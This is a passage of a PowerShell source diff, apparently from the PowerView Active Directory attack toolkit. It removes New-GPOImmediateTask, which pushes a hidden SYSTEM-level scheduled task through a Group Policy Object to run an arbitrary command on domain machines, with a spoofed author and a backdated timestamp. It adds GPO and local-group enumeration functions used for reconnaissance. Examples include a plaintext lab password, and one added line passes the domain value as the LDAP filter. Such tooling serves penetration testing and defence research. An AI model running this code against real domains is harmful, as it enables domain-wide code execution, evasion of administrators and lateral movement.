+ $GroupsXML | Add-Member Noteproperty 'GroupMembers' $Members
+ $GroupsXML.PSObject.TypeNames.Insert(0, 'PowerView.GroupsXML')
+ $GroupsXML
}
}
}
+ catch {
+ Write-Verbose "[Get-GroupsXML] Error parsing $TargetGroupsXMLPath : $_"
+ }
+ }
+
+ END {
+ # remove the SYSVOL mappings
+ $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ }
}
}
-function New-GPOImmediateTask {
+function Get-DomainGPO {
<#
- .SYNOPSIS
+.SYNOPSIS
- Builds an 'Immediate' schtask to push out through a specified GPO.
+Return all GPOs or specific GPO objects in AD.
- .PARAMETER TaskName
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty
- Name for the schtask to recreate. Required.
+.DESCRIPTION
- .PARAMETER Command
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all GPO objects for
+the current domain are returned. To enumerate all GPOs that are applied to
+a particular machine, use -ComputerName X.
- The command to execute with the task, defaults to 'powershell'
+.PARAMETER Identity
- .PARAMETER CommandArguments
+A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted.
- The arguments to supply to the -Command being launched.
+.PARAMETER ComputerIdentity
- .PARAMETER TaskDescription
+Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).
- An optional description for the task.
+.PARAMETER UserIdentity
- .PARAMETER TaskAuthor
-
- The displayed author of the task, defaults to ''NT AUTHORITY\System'
+Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).
- .PARAMETER TaskModifiedDate
-
- The displayed modified date for the task, defaults to 30 days ago.
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- .PARAMETER GPOname
+.PARAMETER Server
- The GPO name to build the task for.
+Specifies an Active Directory server (domain controller) to bind to.
- .PARAMETER GPODisplayName
+.PARAMETER SearchScope
- The GPO display name to build the task for.
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- .PARAMETER Domain
+.PARAMETER ResultPageSize
- The domain to query for the GPOs, defaults to the current domain.
+Specifies the PageSize to set for the LDAP searcher object.
- .PARAMETER DomainController
+.PARAMETER ServerTimeLimit
- Domain controller to reflect LDAP queries through.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- .PARAMETER ADSpath
+.PARAMETER SecurityMasks
- The LDAP source to search through
- e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local"
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
- .PARAMETER Credential
+.PARAMETER Tombstone
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- .EXAMPLE
+.PARAMETER FindOne
- PS> New-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-c "123 | Out-File C:\Temp\debug.txt"' -Force
+Only return one result object.
- Create an immediate schtask that executes the specified PowerShell arguments and
- push it out to the 'SecurePolicy' GPO, skipping the confirmation prompt.
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- PS> New-GPOImmediateTask -GPODisplayName SecurePolicy -Remove -Force
+.PARAMETER Raw
- Remove all schtasks from the 'SecurePolicy' GPO, skipping the confirmation prompt.
+Switch. Return raw results instead of translating the fields into a custom PSObject.
+
+.EXAMPLE
+
+Get-DomainGPO -Domain testlab.local
+
+Return all GPOs for the testlab.local domain
+
+.EXAMPLE
+
+Get-DomainGPO -ComputerName windows1.testlab.local
+
+Returns all GPOs applied windows1.testlab.local
+
+.EXAMPLE
+
+"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO
+
+Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display
+name of "Test GPO"
+
+.EXAMPLE
+
+Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPO -Credential $Cred
+
+.OUTPUTS
+
+PowerView.GPO
+
+Custom PSObject with translated GPO property fields.
+
+PowerView.GPO.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
#>
- [CmdletBinding(DefaultParameterSetName = 'Create')]
- Param (
- [Parameter(ParameterSetName = 'Create', Mandatory = $True)]
- [String]
- [ValidateNotNullOrEmpty()]
- $TaskName,
- [Parameter(ParameterSetName = 'Create')]
- [String]
- [ValidateNotNullOrEmpty()]
- $Command = 'powershell',
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.GPO')]
+ [OutputType('PowerView.GPO.Raw')]
+ [CmdletBinding(DefaultParameterSetName = 'None')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String[]]
+ $Identity,
- [Parameter(ParameterSetName = 'Create')]
- [String]
+ [Parameter(ParameterSetName = 'ComputerIdentity')]
+ [Alias('ComputerName')]
[ValidateNotNullOrEmpty()]
- $CommandArguments,
-
- [Parameter(ParameterSetName = 'Create')]
[String]
- [ValidateNotNullOrEmpty()]
- $TaskDescription = '',
+ $ComputerIdentity,
- [Parameter(ParameterSetName = 'Create')]
+ [Parameter(ParameterSetName = 'UserIdentity')]
+ [Alias('UserName')]
+ [ValidateNotNullOrEmpty()]
[String]
+ $UserIdentity,
+
[ValidateNotNullOrEmpty()]
- $TaskAuthor = 'NT AUTHORITY\System',
+ [String]
+ $Domain,
- [Parameter(ParameterSetName = 'Create')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
+ $LDAPFilter,
+
[ValidateNotNullOrEmpty()]
- $TaskModifiedDate = (Get-Date (Get-Date).AddDays(-30) -Format u).trim("Z"),
+ [String[]]
+ $Properties,
- [Parameter(ParameterSetName = 'Create')]
- [Parameter(ParameterSetName = 'Remove')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $GPOname,
+ $SearchBase,
- [Parameter(ParameterSetName = 'Create')]
- [Parameter(ParameterSetName = 'Remove')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $GPODisplayName,
+ $Server,
- [Parameter(ParameterSetName = 'Create')]
- [Parameter(ParameterSetName = 'Remove')]
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $Domain,
+ $SearchScope = 'Subtree',
- [Parameter(ParameterSetName = 'Create')]
- [Parameter(ParameterSetName = 'Remove')]
- [String]
- $DomainController,
-
- [Parameter(ParameterSetName = 'Create')]
- [Parameter(ParameterSetName = 'Remove')]
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
- $ADSpath,
+ $SecurityMasks,
- [Parameter(ParameterSetName = 'Create')]
- [Parameter(ParameterSetName = 'Remove')]
[Switch]
- $Force,
+ $Tombstone,
- [Parameter(ParameterSetName = 'Remove')]
+ [Alias('ReturnOne')]
[Switch]
- $Remove,
+ $FindOne,
- [Parameter(ParameterSetName = 'Create')]
- [Parameter(ParameterSetName = 'Remove')]
[Management.Automation.PSCredential]
- $Credential
- )
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
- # build the XML spec for our 'immediate' scheduled task
- $TaskXML = '<?xml version="1.0" encoding="utf-8"?><ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}"><ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="'+$TaskName+'" image="0" changed="'+$TaskModifiedDate+'" uid="{'+$([guid]::NewGuid())+'}" userContext="0" removePolicy="0"><Properties action="C" name="'+$TaskName+'" runAs="NT AUTHORITY\System" logonType="S4U"><Task version="1.3"><RegistrationInfo><Author>'+$TaskAuthor+'</Author><Description>'+$TaskDescription+'</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>NT AUTHORITY\System</UserId><RunLevel>HighestAvailable</RunLevel><LogonType>S4U</LogonType></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><AllowStartOnDemand>false</AllowStartOnDemand><Enabled>true</Enabled><Hidden>true</Hidden><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter><RestartOnFailure><Interval>PT15M</Interval><Count>3</Count></RestartOnFailure></Settings><Actions Context="Author"><Exec><Command>'+$Command+'</Command><Arguments>'+$CommandArguments+'</Arguments></Exec></Actions><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers></Task></Properties></ImmediateTaskV2></ScheduledTasks>'
+ [Switch]
+ $Raw
+ )
- if (!$PSBoundParameters['GPOname'] -and !$PSBoundParameters['GPODisplayName']) {
- Write-Warning 'Either -GPOName or -GPODisplayName must be specified'
- return
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $GPOSearcher = Get-DomainSearcher @SearcherArguments
}
- # eunmerate the specified GPO(s)
- $GPOs = Get-NetGPO -GPOname $GPOname -DisplayName $GPODisplayName -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -Credential $Credential
-
- if(!$GPOs) {
- Write-Warning 'No GPO found.'
- return
- }
+ PROCESS {
+ if ($GPOSearcher) {
+ if ($PSBoundParameters['ComputerIdentity'] -or $PSBoundParameters['UserIdentity']) {
+ $GPOAdsPaths = @()
+ if ($SearcherArguments['Properties']) {
+ $OldProperties = $SearcherArguments['Properties']
+ }
+ $SearcherArguments['Properties'] = 'distinguishedname,dnshostname'
+ $TargetComputerName = $Null
+
+ if ($PSBoundParameters['ComputerIdentity']) {
+ $SearcherArguments['Identity'] = $ComputerIdentity
+ $Computer = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1
+ if(-not $Computer) {
+ Write-Verbose "[Get-DomainGPO] Computer '$ComputerIdentity' not found!"
+ }
+ $ObjectDN = $Computer.distinguishedname
+ $TargetComputerName = $Computer.dnshostname
+ }
+ else {
+ $SearcherArguments['Identity'] = $UserIdentity
+ $User = Get-DomainUser @SearcherArguments -FindOne | Select-Object -First 1
+ if(-not $User) {
+ Write-Verbose "[Get-DomainGPO] User '$UserIdentity' not found!"
+ }
+ $ObjectDN = $User.distinguishedname
+ }
- $GPOs | ForEach-Object {
- $ProcessedGPOName = $_.Name
- try {
- Write-Verbose "Trying to weaponize GPO: $ProcessedGPOName"
+ # extract all OUs the target user/computer is a part of
+ $ObjectOUs = @()
+ $ObjectOUs += $ObjectDN.split(',') | ForEach-Object {
+ if($_.startswith('OU=')) {
+ $ObjectDN.SubString($ObjectDN.IndexOf("$($_),"))
+ }
+ }
+ Write-Verbose "[Get-DomainGPO] object OUs: $ObjectOUs"
+
+ if ($ObjectOUs) {
+ # find all the GPOs linked to the user/computer's OUs
+ $SearcherArguments.Remove('Properties')
+ $InheritanceDisabled = $False
+ ForEach($ObjectOU in $ObjectOUs) {
+ $SearcherArguments['Identity'] = $ObjectOU
+ $GPOAdsPaths += Get-DomainOU @SearcherArguments | ForEach-Object {
+ # extract any GPO links for this particular OU the computer is a part of
+ if ($_.gplink) {
+ $_.gplink.split('][') | ForEach-Object {
+ if ($_.startswith('LDAP')) {
+ $Parts = $_.split(';')
+ $GpoDN = $Parts[0]
+ $Enforced = $Parts[1]
+
+ if ($InheritanceDisabled) {
+ # if inheritance has already been disabled and this GPO is set as "enforced"
+ # then add it, otherwise ignore it
+ if ($Enforced -eq 2) {
+ $GpoDN
+ }
+ }
+ else {
+ # inheritance not marked as disabled yet
+ $GpoDN
+ }
+ }
+ }
+ }
- # map a network drive as New-PSDrive/New-Item/etc. don't accept -Credential properly :(
- if($Credential) {
- Write-Verbose "Mapping '$($_.gpcfilesyspath)' to network drive N:\"
- $Path = $_.gpcfilesyspath.TrimEnd('\')
- $Net = New-Object -ComObject WScript.Network
- $Net.MapNetworkDrive("N:", $Path, $False, $Credential.UserName, $Credential.GetNetworkCredential().Password)
- $TaskPath = "N:\Machine\Preferences\ScheduledTasks\"
- }
- else {
- $TaskPath = $_.gpcfilesyspath + "\Machine\Preferences\ScheduledTasks\"
- }
+ # if this OU has GPO inheritence disabled, break so additional OUs aren't processed
+ if ($_.gpoptions -eq 1) {
+ $InheritanceDisabled = $True
+ }
+ }
+ }
+ }
- if($Remove) {
- if(!(Test-Path "$TaskPath\ScheduledTasks.xml")) {
- Throw "Scheduled task doesn't exist at $TaskPath\ScheduledTasks.xml"
+ if ($TargetComputerName) {
+ # find all the GPOs linked to the computer's site
+ $ComputerSite = (Get-NetComputerSiteName -ComputerName $TargetComputerName).SiteName
+ if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {
+ $SearcherArguments['Identity'] = $ComputerSite
+ $GPOAdsPaths += Get-DomainSite @SearcherArguments | ForEach-Object {
+ if($_.gplink) {
+ # extract any GPO links for this particular site the computer is a part of
+ $_.gplink.split('][') | ForEach-Object {
+ if ($_.startswith('LDAP')) {
+ $_.split(';')[0]
+ }
+ }
+ }
+ }
+ }
}
- if (!$Force -and !$psCmdlet.ShouldContinue('Do you want to continue?',"Removing schtask at $TaskPath\ScheduledTasks.xml")) {
- return
+ # find any GPOs linked to the user/computer's domain
+ $ObjectDomainDN = $ObjectDN.SubString($ObjectDN.IndexOf('DC='))
+ $SearcherArguments.Remove('Identity')
+ $SearcherArguments.Remove('Properties')
+ $SearcherArguments['LDAPFilter'] = "(objectclass=domain)(distinguishedname=$ObjectDomainDN)"
+ $GPOAdsPaths += Get-DomainObject @SearcherArguments | ForEach-Object {
+ if($_.gplink) {
+ # extract any GPO links for this particular domain the computer is a part of
+ $_.gplink.split('][') | ForEach-Object {
+ if ($_.startswith('LDAP')) {
+ $_.split(';')[0]
+ }
+ }
+ }
}
+ Write-Verbose "[Get-DomainGPO] GPOAdsPaths: $GPOAdsPaths"
+
+ # restore the old properites to return, if set
+ if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties }
+ else { $SearcherArguments.Remove('Properties') }
+ $SearcherArguments.Remove('Identity')
- Remove-Item -Path "$TaskPath\ScheduledTasks.xml" -Force
+ $GPOAdsPaths | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object {
+ # use the gplink as an ADS path to enumerate all GPOs for the computer
+ $SearcherArguments['SearchBase'] = $_
+ $SearcherArguments['LDAPFilter'] = "(objectCategory=groupPolicyContainer)"
+ Get-DomainObject @SearcherArguments | ForEach-Object {
+ if ($PSBoundParameters['Raw']) {
+ $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw')
+ }
+ else {
+ $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO')
+ }
+ $_
+ }
+ }
}
else {
- if (!$Force -and !$psCmdlet.ShouldContinue('Do you want to continue?',"Creating schtask at $TaskPath\ScheduledTasks.xml")) {
- return
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match 'LDAP://|^CN=.*') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainGPO] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $GPOSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $GPOSearcher) {
+ Write-Warning "[Get-DomainGPO] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ elseif ($IdentityInstance -match '{.*}') {
+ $IdentityFilter += "(name=$IdentityInstance)"
+ }
+ else {
+ try {
+ $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ catch {
+ $IdentityFilter += "(displayname=$IdentityInstance)"
+ }
+ }
+ }
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
}
-
- # create the folder if it doesn't exist
- $Null = New-Item -ItemType Directory -Force -Path $TaskPath
- if(Test-Path "$TaskPath\ScheduledTasks.xml") {
- Throw "Scheduled task already exists at $TaskPath\ScheduledTasks.xml !"
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainGPO] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
}
- $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTasks.xml"
- }
+ $GPOSearcher.filter = "(&(objectCategory=groupPolicyContainer)$Filter)"
+ Write-Verbose "[Get-DomainGPO] filter string: $($GPOSearcher.filter)"
- if($Credential) {
- Write-Verbose "Removing mounted drive at N:\"
- $Net = New-Object -ComObject WScript.Network
- $Net.RemoveNetworkDrive("N:")
- }
- }
- catch {
- Write-Warning "Error for GPO $ProcessedGPOName : $_"
- if($Credential) {
- Write-Verbose "Removing mounted drive at N:\"
- $Net = New-Object -ComObject WScript.Network
- $Net.RemoveNetworkDrive("N:")
+ if ($PSBoundParameters['FindOne']) { $Results = $GPOSearcher.FindOne() }
+ else { $Results = $GPOSearcher.FindAll() }
+ $Results | Where-Object {$_} | ForEach-Object {
+ if ($PSBoundParameters['Raw']) {
+ # return raw result objects
+ $GPO = $_
+ $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw')
+ }
+ else {
+ if ($PSBoundParameters['SearchBase'] -and ($SearchBase -Match '^GC://')) {
+ $GPO = Convert-LDAPProperty -Properties $_.Properties
+ try {
+ $GPODN = $GPO.distinguishedname
+ $GPODomain = $GPODN.SubString($GPODN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ $gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($GPO.cn)"
+ $GPO | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath
+ }
+ catch {
+ Write-Verbose "[Get-DomainGPO] Error calculating gpcfilesyspath for: $($GPO.distinguishedname)"
+ }
+ }
+ else {
+ $GPO = Convert-LDAPProperty -Properties $_.Properties
+ }
+ $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO')
+ }
+ $GPO
+ }
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainGPO] Error disposing of the Results object: $_"
+ }
+ }
+ $GPOSearcher.dispose()
}
}
}
}
-function Get-NetGPOGroup {
+function Get-DomainGPOLocalGroup {
<#
- .SYNOPSIS
+.SYNOPSIS
- Returns all GPOs in a domain that set "Restricted Groups" or use groups.xml on on target machines.
+Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups'
+or Group Policy preferences. Also return their user membership mappings, if they exist.
- Author: @harmj0y
- License: BSD 3-Clause
- Required Dependencies: Get-NetGPO, Get-GptTmpl, Get-GroupsXML, Convert-NameToSid, Convert-SidToName
- Optional Dependencies: None
-
- .DESCRIPTION
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID
+
+.DESCRIPTION
+
+First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed
+arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
+group membership is set through Group Policy Preferences groups.xml files. For any
+GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
+section data is processed if present. Any found Groups.xml files are parsed with
+Get-GroupsXML and those memberships are returned as well.
+
+.PARAMETER Identity
+
+A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted.
+
+.PARAMETER ResolveMembersToSIDs
+
+Switch. Indicates that any member names should be resolved to their domain SIDs.
- First enumerates all GPOs in the current/target domain using Get-NetGPO with passed
- arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
- group membership is set through Group Policy Preferences groups.xml files. For any
- GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
- section data is processed if present. Any found Groups.xml files are parsed with
- Get-GroupsXML and those memberships are returned as well.
+.PARAMETER Domain
- .PARAMETER GPOname
+Specifies the domain to use for the query, defaults to the current domain.
- The GPO name (GUID) to query for, wildcards accepted.
+.PARAMETER LDAPFilter
- .PARAMETER DisplayName
+Specifies an LDAP query string that is used to filter Active Directory objects.
- The GPO display name to query for, wildcards accepted.
+.PARAMETER SearchBase
- .PARAMETER Domain
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- The domain to query for GPOs, defaults to the current domain.
+.PARAMETER Server
- .PARAMETER DomainController
+Specifies an Active Directory server (domain controller) to bind to.
- Domain controller to reflect LDAP queries through.
+.PARAMETER SearchScope
- .PARAMETER ADSpath
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- The LDAP source to search through for GPOs.
- e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local"
+.PARAMETER ResultPageSize
- .PARAMETER ResolveMemberSIDs
+Specifies the PageSize to set for the LDAP searcher object.
- Switch. Try to resolve the SIDs of all found group members.
+.PARAMETER ServerTimeLimit
- .PARAMETER UsePSDrive
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Switch. Mount any found policy files with temporary PSDrives.
+.PARAMETER Tombstone
- .PARAMETER PageSize
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- PS C:\> Get-NetGPOGroup
+.EXAMPLE
- Returns all local groups set by GPO along with their members and memberof.
+Get-DomainGPOLocalGroup
- .EXAMPLE
+Returns all local groups set by GPO along with their members and memberof.
- PS C:\> Get-NetGPOGroup -ResolveMemberSIDs
+.EXAMPLE
- Returns all local groups set by GPO along with their members and memberof,
- and resolve any members to their domain SIDs.
+Get-DomainGPOLocalGroup -ResolveMembersToSIDs
- .EXAMPLE
+Returns all local groups set by GPO along with their members and memberof,
+and resolve any members to their domain SIDs.
- PS C:\> Get-NetGPOGroup -GPOName '{0847C615-6C4E-4D45-A064-6001040CC21C}'
+.EXAMPLE
- Return any GPO-set groups for the GPO with the given name/GUID.
+'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup
- .EXAMPLE
+Return any GPO-set groups for the GPO with the given name/GUID.
- PS C:\> Get-NetGPOGroup -DisplayName 'Desktops'
+.EXAMPLE
- Return any GPO-set groups for the GPO with the given display name.
+Get-DomainGPOLocalGroup 'Desktops'
- .LINK
+Return any GPO-set groups for the GPO with the given display name.
- https://morgansimonsenblog.azurewebsites.net/tag/groups/
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOLocalGroup -Credential $Cred
+
+.LINK
+
+https://morgansimonsenblog.azurewebsites.net/tag/groups/
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.GPOGroup')]
[CmdletBinding()]
- Param (
- [String]
- $GPOname = '*',
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String[]]
+ $Identity,
- [String]
- $DisplayName,
+ [Switch]
+ $ResolveMembersToSIDs,
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $DomainController,
+ $LDAPFilter,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $ADSpath,
+ $SearchBase,
- [Switch]
- $ResolveMemberSIDs,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
- [Switch]
- $UsePSDrive,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200
- )
-
- $Option = [System.StringSplitOptions]::RemoveEmptyEntries
-
- # get every GPO from the specified domain with restricted groups set
- Get-NetGPO -GPOName $GPOname -DisplayName $DisplayName -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -PageSize $PageSize | ForEach-Object {
-
- $GPOdisplayName = $_.displayname
- $GPOname = $_.name
- $GPOPath = $_.gpcfilesyspath
+ $ResultPageSize = 200,
- $ParseArgs = @{
- 'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
- 'UsePSDrive' = $UsePSDrive
- }
-
- # parse the GptTmpl.inf 'Restricted Groups' file if it exists
- $Inf = Get-GptTmpl @ParseArgs
-
- if($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) {
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
- $Memberships = @{}
+ [Switch]
+ $Tombstone,
- # group the members/memberof fields for each entry
- ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) {
- $Group, $Relation = $Membership.Key.Split('__', $Option) | ForEach-Object {$_.Trim()}
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- # extract out ALL members
- $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_}
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
